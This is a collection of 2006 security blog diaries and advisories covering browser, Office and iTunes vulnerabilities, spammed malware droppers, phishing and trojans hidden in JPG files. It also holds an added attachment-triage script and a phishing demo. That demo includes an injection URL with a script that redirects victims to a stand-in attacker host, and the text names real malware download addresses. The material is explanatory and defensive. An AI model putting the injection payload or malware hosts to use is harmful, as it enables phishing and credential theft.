June 2006 - Posts

Two new Internet Explorer vulnerabilities disclosed including PoC (NEW)

Published: 2006-06-30,
Last Updated: 2006-06-30 07:28:33 UTC by Bojan Zdrnja (Version: 3)

Two vulnerabilities in Internet Explorer were published yesterday to the Full-Disclosure mailing list along with their associated PoC code.

The first is a critically rated IE vulnerability in the handling of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) that can be used to trick a user into opening a file by double clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site. The currently available PoC is limited in that it requires the user to double click on an icon to execute a potentially malicious payload, but we can expect to find creative use of this exploit in the wild very soon. The workaround for this appears to be disabling active scripting.

The second vulnerability is related to the handling of the object.documentElement.outerHTML property. Abuse of this property allows an attacker to retrieve remote content in the context of the web page currently being viewed by the user. This vulnerability can be potentially nasty, as attackers can use it to retrieve data from other web sites the user is logged into (for example, webmail) and harvest user credentials. Several handlers have spent a little more time validating this particular issue, and while it is a subtle exploit and rated a lower level risk, it has raised some of our neck hairs.

Microsoft is investigating both issues and Secunia posted a PoC web page for the second vulnerability that you can find at http://secunia.com/internet_explorer_information_disclosure_vulnerability_test.

Regarding the second vulnerability, what's interesting is that we were able to reproduce this even when using Mozilla Firefox.

We have not received any reports of these vulnerabilities being actively exploited in the wild. Please let us know if you have more information and we'll update the diary accordingly.

** Another worthy 'Handler tools' mention, applicable as a general protection tool and gaining increased use for testing malicious code and reviewing potentially malicious websites, is the SandboxIE tool. Browse safely over to http://www.sandboxie.com.

06/28/06
We have been getting comments about the statement that Firefox is vulnerable. After repeated testing, one of the handlers has confirmed that it is definitely vulnerable. The code found at Secunia will not catch vulnerable versions of Firefox, but the original PoC found on Full-Disclosure will work on Firefox.

UPDATE 06/30/06
After doing more research on this vulnerability and with great help from our readers (thanks to Dan and another reader) it seems that Mozilla Firefox is not affected by this vulnerability.

The (obvious) reason for this is that Firefox doesn't support the outerHTML property at all (the innerHTML property is supported). As this property is not supported, the original context can't get any data from the HTML that was loaded into the <object> tag.

If you test this with the original PoC posted on Full-Disclosure, you will notice that Firefox loads the target web page into the object tag, but the alert call (which is in the original context) is not able to get any data. If you use Internet Explorer 6 this is not the case, as the script in the original context can access data that was loaded into the object tag.

The fact that Firefox displays the target web page has nothing to do with this vulnerability (apart from the fact that it can confuse the user, but that's another story); so in this context it's no different than using an iframe.

Internet Explorer 7 is also not affected by this vulnerability.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

iTunes < 6.0.5 vulnerability & patch released (NEW)

Published: 2006-06-29,
Last Updated: 2006-06-29 21:49:43 UTC by Toby Kohlenberg (Version: 1)

Apple has released an update for iTunes that fixes an integer overflow in the AAC file parsing that can lead to code execution. Y'all want to get this one patched and updated.

http://docs.info.apple.com/article.html?artnum=61798
APPLE-SA-2006-06-29 iTunes 6.0.5

iTunes 6.0.5 is now available and, in addition to its other content,
fixes the following security issue:

CVE-ID:  CVE-2006-1467
Available for:  Mac OS X v10.2.8 or later, Windows XP / 2000
Impact:  An integer overflow in iTunes could cause a denial of
service or lead to the execution of arbitrary code
Description:  The AAC file parsing code in iTunes versions prior
to 6.0.5 contains an integer overflow vulnerability. Parsing a
maliciously-crafted AAC file could cause iTunes to terminate or
potentially execute arbitrary code. iTunes 6.0.5 addresses this
issue by improving the validation checks used when loading AAC
files. Credit to ATmaCA working with TippingPoint and the Zero Day
Initiative for reporting this issue.



Cisco Wireless Access Point Vulnerability Announced (NEW)

Published: 2006-06-29,
Last Updated: 2006-06-29 17:35:11 UTC by Toby Kohlenberg (Version: 1)

Cisco has released a vulnerability disclosure for their Wireless Access Points:

http://www.cisco.com/warp/public/707/cisco-sa-20060628-ap.shtml

The vuln is in the web interface for the APs and could allow wiping of the security config and access to the administrative interface without authentication.

To quote Cisco:

A vulnerability exists in the access point web-browser interface when Security > Admin Access is changed from Default Authentication (Global Password) to Local User List Only (Individual Passwords). This results in the access point being re-configured with no security, either Global Password or Individual Passwords, enabled. This allows for open access to the access point via the web-browser interface or via the console port with no validation of user credentials.

The following access points are affected if running Cisco IOS® Software Release 12.3(8)JA or 12.3(8)JA1 and are configured for web-interface management:

  • 350 Wireless Access Point and Wireless Bridge
  • 1100 Wireless Access Point
  • 1130 Wireless Access Point
  • 1200 Wireless Access Point
  • 1240 Wireless Access Point
  • 1310 Wireless Bridge
  • 1410 Wireless Access Point

OK Symantec this is getting pretty ridiculous.  You have put out an update for these two products every month since 10.1 came out in March of 2006.  Don’t even get me started on your product before that. 

Now this latest “update” is over 400mb and appears to be a whole new CD. We have been trying to get this deployed at our company for over a year, and now it looks like we start testing all over again.

The SAVCE version has gone from 10.1.0.401 to 10.1.4.4000, so it looks like someone has been busy this last month.  My question is, was this product even FINISHED when you first released it??  Looks like Symantec has a long way to go before they have software testing down. 

Come on guys, I used to trust your software and recommend it to others.  Now I am not so sure I would.

For the full release notes on this “update”, go here: http://service1.symantec.com/SUPPORT/ent-security.nsf/docid_p/2006050314483048


Email Blast, From the Past

A Microsoft Word document that exploits MS01-034 was mass-spammed today. While this vulnerability was patched nearly 5 years ago, the DOC file can still deliver its payload if users allow Word to run the malicious macro within. Spammed messages use attachment names such as apple_prices.zip, prices.zip, and sony_prices.zip. The archive contains a file named my_notebook.doc, which lists notebooks for sale:

  • Apple MacBook Pro MA463LL/A 15.4″ Notebook PC
  • HP Pavilion DV8230US 17″ Notebook PC
  • Sony VAIO VGN-FS830/W 15.4″ Notebook PC

The DOC file also contains a macro that drops a downloader trojan, which in turn downloads a parasitic virus that is itself also a downloader.

The infection trail can be represented like this:

Spammed email message -> ZIP attachment (prices.zip) ->
Malicious DOC file / Macro (my_notebook.doc) -> Dropped EXE file (666inse_1.exe) ->
Downloaded File (zmacro.txt) -> Downloader Files (…)

This is all attributed to the Sality virus author. Sality is a parasitic infector that uses DLL injection and encryption. It also contains a downloader payload to install adware, remote access trojans, keyloggers, proxy servers, etc.; yet another recent case of a parasitic virus delivering spyware.

Detection for the DOC file and the dropped downloader trojan (666inse_1.exe) will be contained in the next DAT release as W97M/Dropexe and Generic Downloader.ab respectively. Existing W32/Sality.t detection (released May 31, 2006) covers the downloaded Sality virus.

Speaking of old vulnerabilities being targeted by malware, MS03-011 (patched for more than 3 years) is still on the list of top threats being reported by VirusScan Online customers (see Exploit-ByteVerify).  Again, this is exploited by the distributors of spyware in the shape of drive-by downloads.

McAfee Avert Labs Blog » Blog Archive » Email Blast, From the Past.

********************************************************************
Title: Microsoft Security Bulletin Re-Release
Issued: June 27, 2006
********************************************************************

Summary
=======

The following bulletin has undergone a major revision increment.
Please see the appropriate bulletin for more details.

* MS06-025

Bulletin Information:
=====================

* MS06-025
  - http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx
  - Reason for Revision: Microsoft updated this bulletin and the associated security updates to address the issues affecting customers identified in Microsoft Knowledge Base Article 911280.
  - Originally posted: June 13, 2006
  - Updated: June 27, 2006
  - Bulletin Severity Rating: Critical
  - Version: 2.0

********************************************************************


Word macro trojan dropper and (another) downloader (NEW)

Published: 2006-06-27,
Last Updated: 2006-06-27 22:41:08 UTC by Bojan Zdrnja (Version: 1)

We've seen a lot of new malware being spammed in the last couple of hours.

The first piece of malware exploits an old vulnerability in Microsoft Word, MS01-034 (http://www.microsoft.com/technet/security/Bulletin/MS01-034.mspx). This vulnerability allows an attacker to execute embedded macros regardless of the macro security level the user has set in Microsoft Word. Of course, as this is a pretty old vulnerability, only terribly outdated installations will be affected. If you are running any newer version of Microsoft Word, macro settings are on High by default, so only macros signed by trusted sources are executed and all other macros are disabled. A user would have to change this setting to Medium (so they get asked) or Low in order to run this macro. The Word document comes in a ZIP file and, once executed, installs a Trojan. Detection on the Word document is pretty good at the moment.
The document pretends to list computer prices:



The other malware is a plain old (and boring?) downloader, but we've seen a large number of e-mails being spammed with it. The downloader uses typical social engineering to trick the user into opening the archive. Besides the e-mail telling the user there's a nice photo in the attachment, the executable name will be something like DC0019.JPG__[lots of _]__JPG.exe.
The executable always seems to be in a ZIP archive, but sometimes the archive is encrypted (in which case the password is in the e-mail body) and sometimes it's not.

Once executed, the downloader will install on the system and try to download two files:

http:// 206.204.52.54  /img/util/logo_nav.jpg

which is a Symantec logo (more social engineering) and

http:// 218.239.223.224 /flash/menu.swf

this is a site in Korea and the last time we checked the file was not there.

AV detection is pretty low at the moment and only a couple of AV products detected this: Symantec, NOD32, Norman, Trend Micro, Sophos. They either detect it as a downloader or generically (Bloodhound.W32.EP in Symantec's case).
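Both attachments described in this diary (the ZIP-wrapped macro document and the DC0019.JPG__..._JPG.exe downloader, sometimes inside a password-protected archive) can be triaged at the mail gateway before a user double clicks anything. The following is an added example, not code from the ISC diary: the archives are constructed stand-ins built in memory, and the macro check is a string-match heuristic on OLE directory names rather than a full OLE parser.

```python
"""Gateway triage of ZIP attachments for the lures in the two diaries above.
Added example, not ISC code; samples are constructed stand-ins, not malware."""
import io
import re
import zipfile
from dataclasses import dataclass, field
from typing import Dict, List

EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".hta")
OFFICE_EXT = (".doc", ".dot", ".xls", ".xlt")
# "<name>.JPG______JPG.exe": data-file extension, optional underscore/space
# padding with filler, then a real executable extension at the very end.
PADDED_DOUBLE_EXT = re.compile(
    r"\.(?:jpe?g|gif|png|bmp|pdf|txt|doc)(?:[ _]{2,}\S*)?"
    r"\.(?:exe|scr|pif|com|bat|cmd|hta)$",
    re.IGNORECASE,
)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
# OLE directory entry names are UTF-16LE; a macro-carrying document has a
# "_VBA_PROJECT" stream. Plain string match, not a full OLE parser.
VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")
ZIP_FLAG_ENCRYPTED = 0x1  # general-purpose bit 0 in both ZIP headers


@dataclass
class Verdict:
    archive: str
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def has_vba_project(blob: bytes) -> bool:
    """True if blob is an OLE compound file that contains a VBA project."""
    return blob.startswith(OLE_MAGIC) and VBA_MARKER in blob


def triage_zip(archive_name: str, data: bytes) -> Verdict:
    """Inspect every member of a ZIP attachment and collect findings."""
    verdict = Verdict(archive_name)
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        verdict.findings.append("not a valid ZIP archive")
        return verdict
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            encrypted = bool(info.flag_bits & ZIP_FLAG_ENCRYPTED)
            if encrypted:  # password travels in the mail body; content unscannable
                verdict.findings.append(f"password-protected member: {base}")
            if PADDED_DOUBLE_EXT.search(base):
                verdict.findings.append(f"executable with double extension: {base}")
            elif base.lower().endswith(EXEC_EXT):
                verdict.findings.append(f"executable member: {base}")
            elif base.lower().endswith(OFFICE_EXT) and not encrypted:
                if has_vba_project(zf.read(info)):
                    verdict.findings.append(f"Office document with VBA project: {base}")
    return verdict


def _zip_with(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from {member name: content} (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, blob in members.items():
            zf.writestr(name, blob)
    return buf.getvalue()


def _mark_encrypted(zip_bytes: bytes) -> bytes:
    """Set the encrypted flag of a one-member archive so it looks like the
    password-protected lure (flag only; the content is not really encrypted)."""
    data = bytearray(zip_bytes)
    data[6] |= ZIP_FLAG_ENCRYPTED             # local file header, offset 6
    central = data.find(b"PK\x01\x02")
    data[central + 8] |= ZIP_FLAG_ENCRYPTED   # central directory entry, offset 8
    return bytes(data)


# Constructed stand-ins: OLE header plus a VBA stream name, and an MZ stub.
FAKE_MACRO_DOC = OLE_MAGIC + b"\x00" * 504 + VBA_MARKER + b"\x00" * 64
FAKE_EXE = b"MZ" + b"\x90" * 62
PADDED_NAME = "DC0019.JPG" + "_" * 80 + "JPG.exe"
SAMPLES: Dict[str, bytes] = {
    "prices.zip": _zip_with({"my_notebook.doc": FAKE_MACRO_DOC}),
    "photo.zip": _zip_with({PADDED_NAME: FAKE_EXE}),
    "photo_locked.zip": _mark_encrypted(_zip_with({PADDED_NAME: FAKE_EXE})),
    "report.zip": _zip_with({"quarterly.pdf": b"%PDF-1.4\n% constructed\n"}),
}


def triage_all(samples: Dict[str, bytes] = SAMPLES) -> Dict[str, Verdict]:
    return {name: triage_zip(name, blob) for name, blob in samples.items()}
```

Calling triage_all() returns one Verdict per sample archive; the report.zip sample comes back clean and the other three carry the findings that explain why a gateway should hold them.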

Excel Issue Scorecard

Published: 2006-06-25,
Last Updated: 2006-06-25 01:00:02 UTC by Kevin Liston (Version: 2)

To help clearly identify the issues, exploit code and remedies related to the recently announced Excel vulnerabilities, I offer this humble correlation. This information comes from Microsoft, Mitre, and vigilant readers sending in tips. My thanks go to all.

CVE-2006-3059 aka "Excel Repair Mode" http://www.microsoft.com/technet/security/advisory/921365.mspx
Exploited by: Mdropper.G, Booli.A, Flux.E, Booli.B

CVE-2006-3086 aka "Long Hyperlink"   http://blogs.technet.com/msrc/archive/2006/06/20/437826.aspx
Exploited by: Urxcel.A, and three known public exploit code examples

CVE-2006-3014 aka "Shockwave vulnerability"
Exploited by proof of concept code Flemex.A
The workaround is a killbit


Reminder about MS06-025 (NEW)

Published: 2006-06-25,
Last Updated: 2006-06-25 12:35:54 UTC by Kevin Liston (Version: 2)

The original patch from Microsoft caused issues with dialup. Revised patch development was discussed by Microsoft. Exploit code is available that leverages this issue. This allows an authenticated attacker to execute arbitrary code on Win2k SP4, Windows 2003 and XP SP2 systems (we can't comment on anything earlier because they're no longer supported :-P). Previous versions allow unauthenticated attackers to execute arbitrary code, your garden-variety "bad thing(tm)".


********************************************************************
Title: Microsoft Security Advisory Notification
Issued: June 23, 2006
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (921923)
  - Title: Proof of Concept Code Published Affecting the Remote
    Access Connection Manager
  - http://www.microsoft.com/technet/security/advisory/921923.mspx

********************************************************************

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: June 21, 2006
********************************************************************

Summary
=======

The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS06-024
* MS06-025
* MS06-027
* MS06-028
* MS06-032

Bulletin Information:
=====================

* MS06-024
  - http://www.microsoft.com/technet/security/bulletin/ms06-024.mspx
  - Reason for Revision: Bulletin revised "Registry Key Verification" for Windows Media Player 9 on Windows 2000.
  - Originally posted: June 13, 2006
  - Updated: June 21, 2006
  - Bulletin Severity Rating: Critical
  - Version: 1.1

* MS06-025
  - http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx
  - Reason for Revision: Bulletin updated throughout to provide additional differentiation between RRAS, RAS and RASMAN components.
  - Originally posted: June 13, 2006
  - Updated: June 21, 2006
  - Bulletin Severity Rating: Critical
  - Version: 1.2

* MS06-027
  - http://www.microsoft.com/technet/security/bulletin/ms06-027.mspx
  - Reason for Revision: Updated the "What updates does this release replace?" for Word 2003.
  - Originally posted: June 13, 2006
  - Updated: June 21, 2006
  - Bulletin Severity Rating: Critical
  - Version: 1.2

* MS06-028
  - http://www.microsoft.com/technet/security/bulletin/ms06-028.mspx
  - Reason for Revision: Bulletin revised the "What updates does this release replace?" under the "Frequently Asked Questions (FAQ) Related to this Security Update" section.
  - Originally posted: June 13, 2006
  - Updated: June 21, 2006
  - Bulletin Severity Rating: Critical
  - Version: 1.2

* MS06-032
  - http://www.microsoft.com/technet/security/bulletin/ms06-032.mspx
  - Reason for Revision: "FAQ Related to This Security Update" section updated to clarify MS05-019 bulletin replacement. "Vulnerability Details" section of the bulletin was also updated to provide additional information on Disable IP Source Routing.
  - Originally posted: June 13, 2006
  - Updated: June 21, 2006
  - Bulletin Severity Rating: Important
  - Version: 1.1

********************************************************************

********************************************************************
Title: Microsoft Security Advisory Notification
Issued: June 21, 2006
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (921365)
  - Title: Vulnerability in Excel Could Allow Remote
    Code Execution
  - http://www.microsoft.com/technet/security/advisory/921365.mspx
  - Revision Note: Advisory revised to provide additional clarity around the "Impact of Workaround" under "On Excel 2003, prevent Excel Repair mode by modifying the Access Control List (ACL) to the Excel Resiliency registry key" in the "Workarounds for Microsoft Excel Remote Code Vulnerability" section and to update the "Advisory Status".

********************************************************************

Yahoo! Login Server Problems (NEW)

Published: 2006-06-21,
Last Updated: 2006-06-21 15:06:36 UTC by Scott Fendley (Version: 2)

We have received a number of reports indicating problems with various parts of Yahoo! services (mail, IM, groups). These services all seem to work properly with cached credentials, so we suspect that there is a problem with part of the authentication system.  We have _no_ confirmed information of what is the source of these difficulties, but will continue to monitor and update this diary when more information is available.

Update: One of our readers, Nick, noted a possibility of what is going on. XDisclose released an advisory about Yahoo! vulnerabilities located at http://www.xdisclose.com/XD100001.txt . With so little real concrete evidence, I do not know if this is coincidental or not.

<Disclaimer> We cannot confirm what is the true source of this morning's authentication failures. So do not yell at us if the above is truly coincidental, or related to maintenance gone awry regarding it, or something else entirely different. </disclaimer>

ISC Handlers


This explains some things. I have been having trouble with Yahoo for a couple of weeks now, maybe something finally broke.


Microsoft patching more critical vulnerabilities

If you have the feeling that Microsoft could be addressing more critical vulnerabilities, you may be right. Avert Labs has counted the number of vulnerabilities rated Critical and Important over the last 2 1/2 years and plotted them cumulatively by year:

[Figure: Critical vulnerabilities addressed by Microsoft]

[Figure: Important vulnerabilities addressed by Microsoft]
The top graph shows that this year Microsoft has already addressed as many critical vulnerabilities as in the whole of 2005. The bottom graph shows that the number of important vulnerabilities has not changed significantly.

Last week we wrote that we may see the start of a vulnerability growth trend fueled by bounty programs and organized crime. While too early to tell, the statistics indicate that Microsoft seems to be addressing an increasing number of critical vulnerabilities.

McAfee Avert Labs Blog » Blog Archive » Microsoft patching more critical vulnerabilities.

New Excel 0day (Are we evolving or going in circles?) (NEW)

Published: 2006-06-20,
Last Updated: 2006-06-20 16:05:34 UTC by Kyle Haugsness (Version: 1)

(Now before I get hatemail from all the Microsoft fanboys out there, please note that these comments are not derogatory towards Microsoft.  Microsoft has like 110% market share according to their research, so that's why they get all the attention.)

Today there is news of another 0day vulnerability in Microsoft Office.  You can check your favorite vulnerability notification service for all the gory details.  Someone wrote asking for comments and honestly I don't have any step-by-step instructions for defending against this specific threat.  All of the general high-level recommendations from the MS Word 0day a couple of weeks ago still apply.  Perhaps we will have something more detailed later when the details are more clear.

Instead, here are some thoughts about the current state of vulnerability discoveries.  If you have followed along with the industry in the last couple of years, you have probably noticed that remote root/administrator type of bugs have slowly disappeared and now seem to be fairly rare.  Most vulnerability researchers that are publishing advisories now seem to focus on web applications and clients (web browsers, Office, etc).  I am honestly expecting to see a healthy stream of client vulnerabilities in Office applications over the next 2-3 years.  Several years ago, nobody cared too much about exploitable bugs in client side applications because remote bugs were still readily available.  Of course, given the recent media attention about the MS Word 0day exploit, a lot of vulnerability researchers are now hitting Word with every available fuzzer that they have.

So now we have a scenario where there will be a good number of 0day vulnerabilities discovered in client-side applications like MS Office and OpenOffice.  Users will be advised not to open documents from unknown persons.  So have we evolved?  Or have we just jumped back in time ten years when every aspiring script kiddie was writing VBA Macro viruses?

Keep reading for another article about 0day...


Comments on 0day (NEW)

Published: 2006-06-20,
Last Updated: 2006-06-20 17:34:08 UTC by Kyle Haugsness (Version: 1)

Given the recent rumors about 0day in IIS and confirmed 0day in several different Microsoft Office applications, these comments seem appropriate.

The first question I pose is: why the sudden increase in vulnerabilities that are published as 0day instead of responsibly disclosed?  This isn't intended to be a comment on full-disclosure.  But if you look over the past couple of years, almost all vulnerabilities that are discovered by actual researchers (not criminals) were disclosed responsibly to Microsoft.  Is the researching community becoming disenchanted with the long Microsoft patch cycle?  Is there more incentive (fame) for researchers to disclose full details to bugtraq or full-disclosure?  Is there more incentive (financial) to sell an exploit to iDefense, 3com, or the highest bidder on eBay?  If you are a software vendor, what are you doing to ensure that vulnerability researchers are kept happy and disclosing security bugs responsibly?

Now here is where I can feel people firing up their flamethrowers.  There has been lots of panic and rumors recently about 0day bugs.  And it isn't just focused on Microsoft products.  We occasionally get e-mail asking if we know about 0day in OpenSSH, Apache, and PHP.  The question shouldn't be whether 0day exists.  Because 0day exists and it will always exist.

The question is whether you or your organization would be the target of such an exploit?  The time is long gone for an exploit author to embed his nice 0day into a worm and let it run rampant through the Internet.  Today, 0day exploits are more likely to be used for military purposes, financial crime, and possibly terrorist activities (although, probably not).

So in reality, the organizations that really need to be concerned about 0day are the ones responsible for protecting military/government assets, financial institutions, and critical infrastructure agencies.  Since you know 0day exists and if you are a target, what are you doing to protect yourself?  How do you protect against, detect, and respond to unknown vulnerabilities?

For the rest of the folks out there (small/medium businesses, hobbyists)... Should you worry about 0day?  Usually not, but if you have all the other critical security components in place then go ahead.

I'm curious to know what kinds of 0day protection systems people have in place?  In the *NIX world, there are some fairly decent (and free) options for protection:  Grsecurity, NSA SE Linux, Systrace, LIDS, ProPolice GCC patch and others.  How about the Windows side?  There doesn't seem to be much for the folks without hardcore $$.  CORE security has something new called Force (http://force.coresecurity.com/) that looks quite promising.  There is also a good list of commercial products for Windows and some comments compiled by fellow handler Jason Lam here: http://isc.sans.org/diary.php?storyid=635

In summary, you should expect 0day to be alive and well for your favorite operating systems, daemons, and applications.  And if it concerns you, then do something about it instead of waiting to get smacked with it later.  You will sleep better at night and not be frustrated at your favorite software vendor when they take 6+ months to patch simple little vulnerabilities.


********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: June 19, 2006
********************************************************************

Summary
=======

The following bulletin has undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS06-025

Bulletin Information:
=====================

* MS06-025
  - http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx
  - Reason for Revision: Bulletin revised FAQ and Vulnerability Details
    sections to provide clarification on affected RASMAN
    component. Caveats section updated to include known issues.
  - Originally posted: June 13, 2006
  - Updated: June 19, 2006
  - Bulletin Severity Rating: Critical
  - Version: 1.1


Excel new vuln FAQ

Published: 2006-06-19,
Last Updated: 2006-06-19 21:08:13 UTC by Adrien de Beaupre (Version: 2)

Update 2 <06/19/2006 21:00 UTC> Microsoft released an official advisory a little while ago which details other workarounds for the Microsoft Excel Remote Code Vulnerability. This advisory is located at http://www.microsoft.com/technet/security/advisory/921365.mspx. Please read the advisory and see which of the suggested actions fits your environment the best.

Update: A perl script was published on Milw0rm, which appears to exploit *some* Excel vulnerability. It creates a spreadsheet including a very long URL. Once the user clicks on the URL, Excel will crash. As our reader Dominic pointed out, the script does not claim to be the 0day under discussion. Virustotal does not trigger any signatures based on the Excel file generated by the exploit.

Juha-Matti, a regular ISC contributor, has written up some information in a FAQ regarding a recently discovered, previously unknown vulnerability in Microsoft Excel. Gotten tired of the phrase '0day'? I sure have.

http://blogs.securiteam.com/?p=451

Although I do not entirely agree with all of his advice, I think that the first and only defense is defense in depth.
Do NOT rely solely on antivirus.
Do NOT rely solely on filtering by extension.
Do NOT open Excel files that appear unsolicited in your mailbox.
No single tool or measure is sufficient.

I am hoping that the point is getting across: do not rely on traditional defensive measures. It is quite likely they will prove inadequate against a custom-made targeted trojan built just to penetrate your infrastructure, particularly one using an undisclosed vulnerability. No signature based tool can help you in this case.

Cheers,
Adrien
(Maddison's Baba)


************************************************************
Title: Microsoft Security Advisory Notification
Issued: June 19, 2006
************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (921365)
  - Title: Vulnerability in Excel Could Allow Remote
    Code Execution
  - http://www.microsoft.com/technet/security/advisory/921365.mspx
  - Revision Note: Advisory Published: June 19, 2006    

********************************************************************

Empty emails?

Published: 2006-06-18,
Last Updated: 2006-06-18 19:29:26 UTC by Adrien de Beaupre (Version: 1)

I got the first completely empty email sometime late Friday evening, and deleted it without investigating any further. Then I received two more Saturday morning. Now I've gotten almost a dozen, each from a different netblock around the world, and sent to different domains. The SANS NOC has seen 500+. The Internet Storm Center has gotten two queries about them.

There is some speculation it may be malware related, as in a poorly written piece of code spewing out empty emails. One other theory involves confirming known good addresses to seed a new piece of malware or spam. Is this related to Yamanner (sp?)?

Cheers,
Adrien

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Update on the Paypal Phish Phlaw (NEW)

Published: 2006-06-17,
Last Updated: 2006-06-17 13:57:05 UTC by Deborah Hale (Version: 1)

According to an article posted at news.com, PayPal has fixed the flaw in their website that was reported in yesterday's Diary.

PayPal fixes phishing hole

Thanks to one of our readers for supplying us with the information.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Known Issues for the MS06-025 (NEW)

Published: 2006-06-17,
Last Updated: 2006-06-17 12:52:46 UTC by Deborah Hale (Version: 1)

It appears the Microsoft Security Response Center has issued a known-issues update for MS06-025. According to Stephen Toulouse at the Microsoft Security Response Center blog, the update has broken dial-up scripting for those who are still using dial-up connections.

Microsoft Security Response Blog

Thanks to Juha-Matti for calling this to our attention.
SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Adobe Reader Update (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 13:16:40 UTC by Chris Carboni (Version: 1)

Adobe has released an update for Reader in which "several security bug fixes have been made, with one considered critical for the Macintosh OS and several considered to have a low rating for Windows."

Details can be found on Adobe Support Knowledgebase article 327817

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.

Phishes, Phlaws and Phurther Network Phollies (NEW)

Published: 2006-06-16,
Last Updated: 2006-06-16 17:16:51 UTC by Chris Carboni (Version: 1)

Pay Pal Phlaw?

We've received a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users.

The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The page is served over SSL and presents a valid certificate for the PayPal site, so the browser confirms that the site does indeed belong to PayPal.

When the victim visits the page, they are presented with a message that has been 'injected' into the genuine PayPal page through the flaw. It reads, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is redirected to an external server (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member Log-In page.

Logging in sends the PayPal username and password to the bad guys, and a further page then asks for more information (social security number, credit card number, ...) supposedly needed to remove the limits on the account.

More to come as we confirm information.
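The diary does not say how the message got onto the PayPal page. The Python below is an added example, not PayPal's code or anything from the report, and it assumes the most common mechanism for this kind of injection: a request parameter that the server reflects into the page unescaped. It shows the vulnerable rendering beside the hardened one, and adds the second check such a page needs, a redirect target restricted to the site's own hosts (the host allowlist, the `msg` parameter name and the 203.0.113.5 address are all placeholders chosen for the example).

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumption for this example: the site's own hosts, the only acceptable redirect targets.
ALLOWED_REDIRECT_HOSTS = {"www.paypal.com", "paypal.com"}


def render_notice_vulnerable(msg):
    """Reflects a request parameter straight into the page, so attacker markup
    (and script) in the parameter becomes part of the genuine site's HTML."""
    return f'<div class="notice">{msg}</div>'


def render_notice_hardened(msg):
    """Same page with the parameter HTML-escaped: it can only ever render as text."""
    return f'<div class="notice">{html.escape(msg, quote=True)}</div>'


def safe_redirect_target(target, default="/home"):
    """Accept only site-relative paths or https URLs on the site's own hosts.
    Anything else (scheme-relative //host, javascript:, look-alike domains)
    falls back to the default page."""
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        ok = target.startswith("/") and not target.startswith("//")
        return target if ok else default
    if parts.scheme == "https" and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return target
    return default


def handle_request(url, render):
    """Minimal stand-in for the page handler: pull `msg` from the query string and render it."""
    query = parse_qs(urlsplit(url).query)
    msg = query.get("msg", [""])[0]
    return render(msg)


# Constructed attack URL modelled on the diary's description: the lure text followed by
# a script that sends the victim elsewhere after a pause. 203.0.113.5 is a documentation
# address standing in for the attacker's server; the real one is not given in the diary.
ATTACK_URL = (
    "https://www.paypal.com/cgi-bin/webscr?cmd=_login-run&msg="
    "Your+account+is+currently+disabled...+You+will+now+be+redirected+to+Resolution+Center."
    "%3Cscript%3EsetTimeout(function()%7Blocation%3D'http%3A%2F%2F203.0.113.5%2Flogin'%7D%2C3000)"
    "%3C%2Fscript%3E"
)

if __name__ == "__main__":
    print("vulnerable:", handle_request(ATTACK_URL, render_notice_vulnerable))
    print("hardened:  ", handle_request(ATTACK_URL, render_notice_hardened))
    print("redirect:  ", safe_redirect_target("http://203.0.113.5/login"))
```

Escaping on output is what stops the injected script; the redirect allowlist is what stops a legitimate "go to the Resolution Center" feature from being pointed at an attacker's host, which is the second half of the lure described above.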


FDIC Phish

Juha-Matti dropped us a link to a newly added US-Cert Advisory detailing a scam targeting customers of FDIC insured institutions.

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.


Trojan Frog on the Loose

Here’s a trick the traffall.biz (aka iframecash.biz) gang has been using for at least a few weeks. In addition to their usual Internet Explorer exploitation to install downloading downloader trojans (downloading downloading downloaders in many cases), they’ve been obfuscating some of the traffic by hiding exe files within JPG files. A network administrator would see HTTP GET requests to traffall.biz/pic/[filename].jpg, which would appear normal (unless you were up to date on your bad-domain list). And if you were to download the ‘.jpg’ files, they would indeed at first appear to be just an image of a goofy frog:

Trojan Frog

Here’s a Hex dump of the start of the JPG file:

Hex View of JPG file

In the middle of the file, we can see the encrypted executable (the cursor is at the start):

Hex view of encrypted EXE file

